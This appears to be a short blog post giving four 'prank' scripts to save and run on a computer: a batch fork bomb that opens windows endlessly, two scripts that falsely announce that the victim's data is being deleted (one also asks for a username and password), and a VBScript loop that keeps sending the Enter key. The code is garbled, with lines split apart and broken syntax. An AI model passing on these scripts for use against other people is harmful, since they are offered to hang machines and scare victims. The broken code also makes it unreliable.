1st - @echo off
md hello
:A
Start hello
Goto A
(now save file.bat)
2nd - Y
Echo
Ping
localhost –n 1>nul
Cls
Dir/s
Echo.
Echo.
Ping
localhost –n 2>nul
Cls
Echo all
data has been deleted..
Pause
Del “c:delete.bat”
(Now save
this as mranolika.bat)
3rd – echo good luck
Set/p\/name=username:
Set/p\/password=password:
Echo haha
you got the username and
Password
wrong
Pause
Echo file
are being deleted
Pause dir/s
Del
“c:up.bat
(seve it as
ss.bat)
4th – Set wshShell = wscript.CreateObject
(“WScript.Shell”)
Do
Wscript.sleep
100
Wshshell.sendkeys
“~ (enter)”
Loop
(Now save it
as xkx.vbs)
Comments
Post a Comment